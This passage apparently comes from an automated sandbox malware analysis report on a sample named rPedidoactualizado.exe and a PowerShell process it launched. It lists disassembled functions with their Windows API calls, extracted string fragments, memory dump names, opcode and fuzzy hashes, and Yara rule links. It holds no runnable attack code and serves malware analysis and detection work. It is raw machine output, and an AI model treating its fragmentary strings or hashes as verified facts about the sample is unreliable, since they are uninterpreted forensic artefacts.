FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
GlobalFree.KERNEL32(00000000), ref: 00403913

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403904

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8

Function 00405BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPedidoactualizado.exe,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPedidoactualizado.exe,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE

Strings

C:\Users\user\Desktop, xrefs: 00405BB8

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD

Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

Analysis Process: powershell.exePID: 5408, Parent PID: 2140COMMON

Executed Functions

Function 051FDFE0 Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ea1b0231e98245f4a98bbcfbc9a7f19156093838d0216aa2b63b9d93a1b732
Instruction ID: 53f561d0f3f6706a96e7eb3c62af68164cc4975fbdc05ccff1ca87d625f7162e
Opcode Fuzzy Hash: 17ea1b0231e98245f4a98bbcfbc9a7f19156093838d0216aa2b63b9d93a1b732
Instruction Fuzzy Hash: D6529E34B01319CFCB64DF24D854AADBBB7FF85204F1442A9DA0AA7361EB349946CF52

Function 07B74AA8 Relevance: 31.1, Strings: 24, Instructions: 1099COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B74D1E
4']q, xrefs: 07B74E7D
4']q, xrefs: 07B75264
4']q, xrefs: 07B7506C
4']q, xrefs: 07B74F19
4']q, xrefs: 07B74E71
4']q, xrefs: 07B7530F
4']q, xrefs: 07B7576A
4']q, xrefs: 07B75776
4']q, xrefs: 07B751BC
4']q, xrefs: 07B75114
4']q, xrefs: 07B75258
4']q, xrefs: 07B75060
4']q, xrefs: 07B754F6
4']q, xrefs: 07B74D2A
4']q, xrefs: 07B74DC6
4']q, xrefs: 07B74DD2
4']q, xrefs: 07B751B0
4']q, xrefs: 07B74F25
}l, xrefs: 07B74BE3
}l, xrefs: 07B74BD9
4']q, xrefs: 07B75502
4']q, xrefs: 07B75108
4']q, xrefs: 07B75303

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$}l$}l
API String ID: 0-2033858819
Opcode ID: 6f14193d3ce33bfddd83f8cccd332ea924179210b8bc1e6e3ba448cf60cbbb6a
Instruction ID: 0a1b290eabe833cac5db5b7799fc5154bcc71f143429a8c65c70cd1c83527cd8
Opcode Fuzzy Hash: 6f14193d3ce33bfddd83f8cccd332ea924179210b8bc1e6e3ba448cf60cbbb6a
Instruction Fuzzy Hash: B2A291B0B10204CFEB24CB68C590BADBBB2EF85714F6185A9E9156B341CB72ED45CF91

Function 07B73278 Relevance: 18.5, Strings: 14, Instructions: 980COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07B7355C
4']q, xrefs: 07B747D8
4']q, xrefs: 07B733D1
4']q, xrefs: 07B74759
tP]q, xrefs: 07B73568
4']q, xrefs: 07B73D5A
4']q, xrefs: 07B733DD
-xk, xrefs: 07B7400C
-xk, xrefs: 07B74869
x.xk, xrefs: 07B73FDA
4']q, xrefs: 07B73D66
x.xk, xrefs: 07B74824
4']q, xrefs: 07B74765
4']q, xrefs: 07B747E4

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.xk$x.xk$-xk$-xk
API String ID: 0-82941372
Opcode ID: 2d85a462cec4b0ac29fbac956e983d6dee44525c063f5781208359863a15c4e3
Instruction ID: d36f17149241f8ca8237ba874fd9ae4e4f47acc9b6b47e52ef408c005b8694f9
Opcode Fuzzy Hash: 2d85a462cec4b0ac29fbac956e983d6dee44525c063f5781208359863a15c4e3
Instruction Fuzzy Hash: 5382AEB0B002459FEB24DB58CA51BAABBF2EF85314F10C4E9D9199B351CB32DD45CBA1

Function 07B74AA3 Relevance: 15.9, Strings: 12, Instructions: 877COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B75258
4']q, xrefs: 07B74D1E
4']q, xrefs: 07B75060
4']q, xrefs: 07B754F6
4']q, xrefs: 07B74DC6
4']q, xrefs: 07B751B0
4']q, xrefs: 07B74F19
4']q, xrefs: 07B74E71
}l, xrefs: 07B74BD9
4']q, xrefs: 07B75108
4']q, xrefs: 07B7576A
4']q, xrefs: 07B75303

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$}l
API String ID: 0-1385878731
Opcode ID: a115bcc39abf38f7d0c64396569bc06acc2cd107f4f2ce5443ad2b605256f02c
Instruction ID: 0e8c90647cf4dbd16df571e9792ec021a5a914bb3f1474953fa951c723a991bf
Opcode Fuzzy Hash: a115bcc39abf38f7d0c64396569bc06acc2cd107f4f2ce5443ad2b605256f02c
Instruction Fuzzy Hash: 9282A2B0A10204DFEB24CB58C580BADBBB2EF85715F6185A9E9156F342CB72ED41CF91

Function 07B71228 Relevance: 11.8, Strings: 9, Instructions: 594COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07B712B3
4']q, xrefs: 07B71596
4']q, xrefs: 07B715A2
4']q, xrefs: 07B71818
4']q, xrefs: 07B71824
tP]q, xrefs: 07B712BF
$]q, xrefs: 07B71B44
tP]q, xrefs: 07B71BE0
tP]q, xrefs: 07B71BD4

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q
API String ID: 0-3647279530
Opcode ID: a7e217059dabb8f2febdd1f462436f1a36e5ab839e3f2561937ebea0d8677c6f
Instruction ID: 6fa3477e1dd5215a4b8a1aa344af3bfc58d70f266f13e31b871f1af7ee96bfdb
Opcode Fuzzy Hash: a7e217059dabb8f2febdd1f462436f1a36e5ab839e3f2561937ebea0d8677c6f
Instruction Fuzzy Hash: 1E32AFB0B00209DFEB24CB5CC581BAABBE2EFC5314F1484A9E9159B755CB72DC45CBA1

Function 07B7C7FE Relevance: 9.7, Strings: 7, Instructions: 984COMMON

Download Yara Rule

Strings

x.xk, xrefs: 07B7D895
4']q, xrefs: 07B7CD1D
4']q, xrefs: 07B7D4AC
4']q, xrefs: 07B7CD29
x.xk, xrefs: 07B7CF58
4']q, xrefs: 07B7D4C2
-xk, xrefs: 07B7CF8A

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$x.xk$x.xk$-xk
API String ID: 0-1089264300
Opcode ID: f99a764fe1a78c077ae5b92baa76f603547aaed7536ff58539a803aa80811de3
Instruction ID: 93c3817484be1e6b2d255372565c591a249bf741f1caee25e629c819e6494fda
Opcode Fuzzy Hash: f99a764fe1a78c077ae5b92baa76f603547aaed7536ff58539a803aa80811de3
Instruction Fuzzy Hash: 119230B0B00214DFDB64DB68CA51BAABBB2EF85304F1084E8D9195B751CB72ED85CF91

Function 07B78518 Relevance: 5.6, Strings: 4, Instructions: 594COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B78860
4']q, xrefs: 07B789E6
4']q, xrefs: 07B78856
4']q, xrefs: 07B789F0

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 7406736742845108f8006f0b2b26344fd08ddc25a9375d2ea18c72c280d947c4
Instruction ID: 6213e3ba0e1424e2e963dcb8827815fab65ff7c02dea04b2d8fefb7940e5cb95
Opcode Fuzzy Hash: 7406736742845108f8006f0b2b26344fd08ddc25a9375d2ea18c72c280d947c4
Instruction Fuzzy Hash: C81239F1B042059FEB259B68851876ABBA2EFC1710F14C8FAD925CF351DB32D845C7A2

Function 07B74450 Relevance: 5.3, Strings: 4, Instructions: 289COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B747D8
-xk, xrefs: 07B74869
4']q, xrefs: 07B74759
x.xk, xrefs: 07B74824

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$x.xk$-xk
API String ID: 0-3273902223
Opcode ID: 6a44f374e3698e777e52023d5139f92535fc5f3ec210bb9b27db45dbacb4d885
Instruction ID: bfeb1d82933d1912061970974d499a6442a76a88a3a87f6fc4d8a49da6e8b9f4
Opcode Fuzzy Hash: 6a44f374e3698e777e52023d5139f92535fc5f3ec210bb9b27db45dbacb4d885
Instruction Fuzzy Hash: 7BB192B0A002059FDB24DF98C654BAEBBB2EF88311F15C8A5D9116F355CB35EC45CBA1

Function 07B740A2 Relevance: 4.4, Strings: 3, Instructions: 644COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B73D5A
x.xk, xrefs: 07B73FDA
-xk, xrefs: 07B7400C

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$x.xk$-xk
API String ID: 0-1224864711
Opcode ID: d74a5530bd9aa48c9d8550a00c028e8e8f9b063d929cd0395686fa4c1fdfde94
Instruction ID: 848f4a8b3f8c7b3195d16bd4e6ffe5bb527dbf6b7212410e1c2d3a80a1a97696
Opcode Fuzzy Hash: d74a5530bd9aa48c9d8550a00c028e8e8f9b063d929cd0395686fa4c1fdfde94
Instruction Fuzzy Hash: F5525FB07002149FEB24DB58CA51BA9BBB2FB84315F10C4E5E9199B351CB72ED85CF91

Function 07B73610 Relevance: 4.4, Strings: 3, Instructions: 629COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B73D5A
x.xk, xrefs: 07B73FDA
-xk, xrefs: 07B7400C

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$x.xk$-xk
API String ID: 0-1224864711
Opcode ID: 18a35d1fc6112905795e5f0f52f622d13720f20074c23642932924cb8fcc9191
Instruction ID: cc2108e4e40378bd8154fa7bbaa0a6501cb54a747f2f740491b610a52bb3485e
Opcode Fuzzy Hash: 18a35d1fc6112905795e5f0f52f622d13720f20074c23642932924cb8fcc9191
Instruction Fuzzy Hash: 98425DB0A002149FEB24DF58CA91BA9BBF2EB84314F11C4E5D9199B351CB72ED85CF91

Function 07B7D023 Relevance: 4.4, Strings: 3, Instructions: 621COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B7CD1D
-xk, xrefs: 07B7CF8A
x.xk, xrefs: 07B7CF58

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$x.xk$-xk
API String ID: 0-1224864711
Opcode ID: 1bef5cbefca7a0c610f6e487a594938d5d712631e6b8c9bd7676fd41949c382f
Instruction ID: 4fb43e149574b126a36f61e63e0fa06d9ee274480b273cdfbe911a73bff085a2
Opcode Fuzzy Hash: 1bef5cbefca7a0c610f6e487a594938d5d712631e6b8c9bd7676fd41949c382f
Instruction Fuzzy Hash: CA424FB07002149FDB64DB58CA91FAABBB2EB85304F1084E8E9195F751CB72ED85CF91

Function 07B741B5 Relevance: 4.2, Strings: 3, Instructions: 487COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B73D5A
x.xk, xrefs: 07B73FDA
-xk, xrefs: 07B7400C

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$x.xk$-xk
API String ID: 0-1224864711
Opcode ID: acf142730e300b2c576efb090003dace8fde5fa3315777c5e73276d68435a411
Instruction ID: fc700913a468d2f595b992e8568b3dc99c7a3353d1c173668d9870f3242406be
Opcode Fuzzy Hash: acf142730e300b2c576efb090003dace8fde5fa3315777c5e73276d68435a411
Instruction Fuzzy Hash: B92250B06002149FEB24DF58CA91B99BBF2EB84315F1084E4E9199F351CB72ED85CF91

Function 07B7D10A Relevance: 4.2, Strings: 3, Instructions: 468COMMON

Download Yara Rule

Strings

4']q, xrefs: 07B7CD1D
-xk, xrefs: 07B7CF8A
x.xk, xrefs: 07B7CF58

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$x.xk$-xk
API String ID: 0-1224864711
Opcode ID: 4926fc2b3bf6164ec5af48c8f1597bb750f48fbde884b8cfd6f2ad1a8be16577
Instruction ID: 59e9d60fd0bd7f2d2372eef18a8b374ba290722baa8e148e3415c2977afeeeb5
Opcode Fuzzy Hash: 4926fc2b3bf6164ec5af48c8f1597bb750f48fbde884b8cfd6f2ad1a8be16577
Instruction Fuzzy Hash: 3F1231B07002149FDB64DB58CA51FAEBBA2EB85304F1088E8E9195F751CB72ED45CF91

Function 07B71100 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07B71168
$]q, xrefs: 07B7115C
$]q, xrefs: 07B71112

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: 5c98fa0f53073cc511dcf9cb367a12e1c4903b8b33f7d7142b068940c43a5dfa
Instruction ID: 0cba8ce3fc37c09156fc1bfb7d75fe72fb439a3ced877ca0acc74e725f39822a
Opcode Fuzzy Hash: 5c98fa0f53073cc511dcf9cb367a12e1c4903b8b33f7d7142b068940c43a5dfa
Instruction Fuzzy Hash: EF213AF131030E9BEB34556E8940B7776DADBC1A11F2488BAA919CFB85DA36C845C371

Function 07B7D1A9 Relevance: 2.9, Strings: 2, Instructions: 424COMMON

Download Yara Rule

Strings

x.xk, xrefs: 07B7D895
4']q, xrefs: 07B7D4AC

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$x.xk
API String ID: 0-1904515423
Opcode ID: 3a86468c86bc24b438e9d8f007e004b7690fa9bb8ba9d948d4f2ee048e4922ab
Instruction ID: c5fc17194e2099bfcaf2d2ee280c39379d84f33cd5e0d980747a38cedcee4186
Opcode Fuzzy Hash: 3a86468c86bc24b438e9d8f007e004b7690fa9bb8ba9d948d4f2ee048e4922ab
Instruction Fuzzy Hash: C3122AB4B00215DFEB60CB18CA51BAAB7B2FF85344F1084E9D9196B751CB32AD85CF91

Function 07B7D193 Relevance: 2.8, Strings: 2, Instructions: 331COMMON

Download Yara Rule

Strings

x.xk, xrefs: 07B7D895
4']q, xrefs: 07B7D4AC

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$x.xk
API String ID: 0-1904515423
Opcode ID: 96794325ddc54dcd5edcdf8d9cb0bfebc43414ab2f4947313caa6bcdc2e36548
Instruction ID: c67d071599552ca778d5e31d474b7b2f8a72421471fab43ce66286d96f082826
Opcode Fuzzy Hash: 96794325ddc54dcd5edcdf8d9cb0bfebc43414ab2f4947313caa6bcdc2e36548
Instruction Fuzzy Hash: 35E13CB0B00215DFEB60CB14C955BAAB7B2FF85344F1085E8E519AB751CB32AD85CF51

Function 07B70C68 Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07B70D18
tP]q, xrefs: 07B70D0C

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: 2cd143613b684a042887697b70e274e4a265ac541a0c30941ac48a6456b36fa5
Instruction ID: 3772c875782953e854abaa9e4c0d6fbb7ad3a2ba27284b3b6fc6bf3dbc411901
Opcode Fuzzy Hash: 2cd143613b684a042887697b70e274e4a265ac541a0c30941ac48a6456b36fa5
Instruction Fuzzy Hash: 3D518BF17043459FD7256B68C94076ABBE6EF81311F14C4FBD965CB291CA71D844C3A1

Function 07B710E6 Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

$]q, xrefs: 07B7115C
$]q, xrefs: 07B71112

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 9e981627fc4be6dbc244934060e8a0701ee500f45dbe0753bd0fdd2fc0aca48b
Instruction ID: 3091a93d99a45a9972e0aa3d7b704e4b980e1ba1e5ac3ffb18cfc8fd211df790
Opcode Fuzzy Hash: 9e981627fc4be6dbc244934060e8a0701ee500f45dbe0753bd0fdd2fc0aca48b
Instruction Fuzzy Hash: 872138F130838DAEFB31052949407627BA59FC2A40F1884EBE9A4DFB96D6298944C331

Function 051F2AA0 Relevance: 1.5, Strings: 1, Instructions: 275COMMON

Download Yara Rule

Strings

i}k, xrefs: 051F2DA8

Memory Dump Source

Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd

Similarity

API ID:
String ID: i}k
API String ID: 0-4172715734
Opcode ID: 587413f1ab1aba28e9f6db3036ddb2179e4d6eb8df0633b8a43ae6a123f31513
Instruction ID: 2f06d15f93280a8adebc97cd9752d2250631e2ebb4b0f883e3203b2f5854a1a2
Opcode Fuzzy Hash: 587413f1ab1aba28e9f6db3036ddb2179e4d6eb8df0633b8a43ae6a123f31513
Instruction Fuzzy Hash: C5B12274A082859FC706CF6CC8E09AABFB1FF4A314B194196C955DB3A6C335EC41CBA0

Function 07B748F0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.xk, xrefs: 07B749A2

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd

Similarity

API ID:
String ID: x.xk
API String ID: 0-2157606827
Opcode ID: 65d305f6ad521b6f260e8230ea8d83bcadde71dc45dce7881e7166d5fa6fc59d
Instruction ID: d80093ed22f4db416341678bab02563d7bf16a21e53845d54e77b3ecfe2cf67f
Opcode Fuzzy Hash: 65d305f6ad521b6f260e8230ea8d83bcadde71dc45dce7881e7166d5fa6fc59d
Instruction Fuzzy Hash: DA31D3B0740100AFE7249764CA55BAE7AA3EFC4310F148874E9016F791CF769D45CBE5

Function 07B760DA Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

$]q, xrefs: 07B760BA

Memory Dump Source

Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
